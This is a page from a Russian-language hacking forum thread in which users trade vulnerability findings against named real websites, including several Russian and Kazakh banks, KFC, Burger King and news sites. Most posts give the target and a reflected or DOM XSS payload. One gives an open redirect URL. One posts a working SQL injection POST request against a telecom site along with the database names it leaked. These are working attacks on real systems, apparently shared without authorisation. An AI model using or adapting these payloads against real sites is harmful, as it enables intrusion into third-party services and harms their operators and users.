Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

Page 9 of 18
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    последнее это что?
     
    _________________________
    #161 yarbabin, 29 Aug 2015
  2. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    #162 ocheretko, 29 Aug 2015
  3. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    target: http://www.kred-bank.ru
    type: XSS Reflected
    Строка поиска:
    Code:
    "><script>alert('Hello')</script>
     
    #163 joelblack, 29 Aug 2015
  4. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    target : http://6dosug777.com/en/spb/forum/o...u-po-karmanu-raznyie-tsenovyie-kategor.9.html
    Type:XSS-Reflected
    Code:
    '<script>alert('SIXSS')</script>

    Там в самом внизу комментарии можно оставлять без всяких заполнений .
    Сорри,я там нафлудил чуток) .

    Скрипт можете вставить свой,я чисто для примера другой написал .
     
    #164 SaNDER, 29 Aug 2015
  5. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ну может скопипастил,но не специально,т.к я просто рыскал по гуглу :) .

    А последнее это та же XSS,но на крайняк может понадобиться ;) .
     
    #165 SaNDER, 29 Aug 2015
  6. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    target: http://sobinbank.ru/
    type: Open Redirect
    Code:
    http://sobinbank.ru/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=http://ya.ru
    target: http://sinko-bank.ru
    type: XSS Reflected
    Строка поиска:
    Code:
    "><script>alert('Hello')</script>
     
    #166 joelblack, 29 Aug 2015
    SaNDER and DDShadoww like this.
  7. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    target: http://halykbank.kz
    type: XSS-Reflected

    HTML:
    http://halykbank.kz/ru/search?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
     
    #167 DDShadoww, 29 Aug 2015
    joelblack likes this.
  8. w0rm_

    w0rm_ Banned

    Joined:
    19 Aug 2015
    Messages:
    11
    Likes Received:
    24
    Reputations:
    8
    Target:home.singtel.com
    Type: SQL injection

    Code:
    http://home.singtel.com/include/tell_a_friend_process.asp 

POST:
segment_id_=awdpojawdpj&url_=awdz&page_title_=awd&[email protected]' and 1=(select top 1 table_name from information_schema.tables)--&email_from_=aaw221&remark_=awdawd22&x=9&y=5 

singtelsgp 
singtelsgp-stag 
miotv-stag 
singtelmiotvstaffplan 
miotv-prd 
STSGP09-stag 
STSGP09 
ClickCounter 
STMIO-STAG 
STMIO 
uefa-phase1 
uefa-prod 
uefa-stag 
STSGP2011-stag-KIV 
STSGP2011-KIV 
race2011-stag 
race2011-prod 
singtelcorp2010new 
yog 
YOGWEBCAST 
STCON 
STBIZ 
singtel_3 
singtel_3_Monday1 
eids_sso 
accelerate 
browdb 
faceapp-stag 
faceapp-prod 
distis_agent 
miotv400k_prd
     
    #168 w0rm_, 30 Aug 2015
    Take_IT and YaBtr like this.
  9. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    target: 3dnews.ru
    type: DOM Based XSS

    В поля поиска
    Code:
    <script>alert(1)</script>
     
    #169 DDShadoww, 30 Aug 2015
    Last edited: 23 Sep 2015
  10. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    target:subscribe.ru
    type:XSS-Reflected
    Поиск :
    Code:
    <script>alert('XSS')</script>



    Кто-то уже до меня нашёл :Р .
     
    #170 SaNDER, 30 Aug 2015
  11. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    XSS на мобильной версии сайта KFC

    target: m.kfc.ru/career-vacancies/member
    type: XSS-Reflected

    В поля Фамилия, имя вводим
    Code:
    "><script>alert("XSS")</script>
    и так же в поле Мобильный телефон
     
    #171 DDShadoww, 30 Aug 2015
    yarbabin likes this.
  12. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    BurgerKing

    target: burgerking.ru
    type: XSS-Reflected

    В поля поиска

    Code:
    "><script>alert(1)</script>
     
    #172 DDShadoww, 30 Aug 2015
    YaBtr likes this.
  13. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target: _ttp://www.edelws.ru
    Type : XSS-Reflected(вбивается под поисковик .)
    Code:
    "><script>alert("WH")</script>
     
    #173 SaNDER, 2 Sep 2015
    Last edited: 9 Sep 2015
  14. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    это DOM based XSS
    работает даже в хроме
    Code:
    http://www.3dnews.ru/search/#query=<script>alert(1)</script>&sdate=&edate=&intitle=0
     
    #174 psihoz26, 2 Sep 2015
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    страннло что у меня не работает, может хром старый?
     
    #175 BabaDook, 2 Sep 2015
  16. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Введи в поиск и нажми значок поиска <script>alert(1)</script>
    [​IMG]
     
    #176 ocheretko, 2 Sep 2015
  17. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.militarynews.ru/default.asp?SStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    пассивно-активная XSS.
    Интересно то, что если после перехода по ссылке попробовать авторизоваться, то окошко авторизации выскакивает во второй раз.
     
    #177 Muracha, 7 Sep 2015
  18. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: allbanks.ru
    Type: Reflected

    В поля поиска -
    Code:
    "><script>alert(1)</script>

    Target:     capitalbank.kz/oldsite/
    Type: Reflected

    В поля поиска -
    Code:
    "><script>alert(1)</script>


    Target: asbank.ru/
    Type: Reflected

    В поля поиска -
    Code:
    "><script>alert(1)</script>
     
    #178 DDShadoww, 8 Sep 2015
    Last edited: 8 Sep 2015
  19. d3q

    d3q New Member

    Joined:
    6 Sep 2015
    Messages:
    7
    Likes Received:
    3
    Reputations:
    0
    Видимо опечатка - второй и третий символ надо поменять местами
    Code:
    "><script>alert("WH")</script>
    :)
     
    #179 d3q, 9 Sep 2015
    SaNDER likes this.
  20. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: foto7an.se
    Type: Reflected and Stored

    Весь в XSS. И еше бонус - foto7an.se/files/
     
    #180 DDShadoww, 12 Sep 2015
(You must log in or sign up to post here.)
Page 9 of 18
Loading...
Similar Threads - Уязвимости SQLi
  1. zase

    массовый взлом сайтов

    zase, 25 Dec 2022, in forum: Песочница
    Replies:
    1
    Views:
    3,587
    lifescore
    14 Jan 2023
  2. Shadows_God

    Взлом сайтов

    Shadows_God, 20 Nov 2022, in forum: Песочница
    Replies:
    14
    Views:
    8,204
    CyberTro1n
    4 May 2024
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.